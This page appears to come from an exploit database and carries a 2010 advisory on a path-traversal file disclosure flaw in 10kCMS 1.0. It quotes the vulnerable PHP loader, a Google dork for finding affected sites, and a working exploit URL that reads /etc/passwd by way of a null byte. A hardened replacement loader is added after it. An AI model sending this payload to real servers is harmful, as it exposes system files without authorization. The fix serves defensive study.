0day Today Exploits Market and 0day Exploits Database

10kCMS File Disclosure Vulnerability

Author: pimpim
Risk: [ Security Risk Unsorted ]
0day-ID: 0day-ID-13728
Category: web applications
Date added: 17-08-2010
Platform: php
====================================
10kCMS File Disclosure Vulnerability
====================================


# Author: pimpim
# Software Link: http://www.10kcms.com/?page=download
# Version: 1.0
# Category: webapps
# Google dork: Generated by 10kCMS
# Tested on: Linux

#Vulnerable code:
//Load filename from URL
if (isset($_GET['page']) && (file_exists($_GET['page'].'.txt'))) //If the url contains an existing filename
{
	$filename = $_GET['page'].'.txt';  //Load it
}
else
{
	$filename = 'index.txt';  //Otherwise, default to index.txt
	$htmltitle= 'Home';
}

//Load in the file contents
$fp = fopen($filename,"r");

#Exploit: http://localhost/...path.../?page=../../../../../etc/passwd%00
The null byte (%00) must be used to strip off the ".txt" extension that the code appends to the "page" parameter.
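
#Hardened loader (added example, not part of the original advisory and not 10kCMS code):
The function name resolve_page() and the dedicated content directory $contentDir are assumptions. It replaces the "Load filename from URL" step with an allow-list on the page name plus a realpath() containment check, and falls back to index.txt for anything else.

```php
<?php
// Added example: hardened replacement for the vulnerable page lookup.
// resolve_page() and $contentDir are hypothetical names, not 10kCMS identifiers.

function resolve_page($page, string $contentDir): string
{
    $default = $contentDir . DIRECTORY_SEPARATOR . 'index.txt';

    // 1. Allow-list the name. Arrays (?page[]=x), slashes, dots and
    //    null bytes all fail here, so "../" and "%00" never reach the filesystem.
    if (!is_string($page) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return $default;
    }

    // 2. Canonicalise and confirm the file is still inside the content directory
    //    (covers symlinks that point outside it).
    $base = realpath($contentDir);
    $path = realpath($contentDir . DIRECTORY_SEPARATOR . $page . '.txt');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0
        || !is_file($path)) {
        return $default;
    }
    return $path;
}

// In the CMS this would be: $filename = resolve_page($_GET['page'] ?? null, $contentDir);

// Constructed demo: a throwaway content directory holding two pages.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/index.txt', "Home\n");
file_put_contents($dir . '/about.txt', "About\n");

// Constructed inputs: one valid page, the advisory's request value, and other rejects.
$inputs = ['about', '../../../../../etc/passwd' . "\0", '../about', 'missing', ['x'], null];
foreach ($inputs as $in) {
    // Only 'about' resolves to about.txt; every other input falls back to index.txt.
    printf("%-40s => %s\n", json_encode($in), basename(resolve_page($in, $dir)));
}
```

Even on PHP versions that reject null bytes in file paths (5.3.4 and later), the original code still lets the "page" parameter traverse to any readable .txt file, so the allow-list and containment check are needed either way.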



#  0day.today [2024-12-25]  #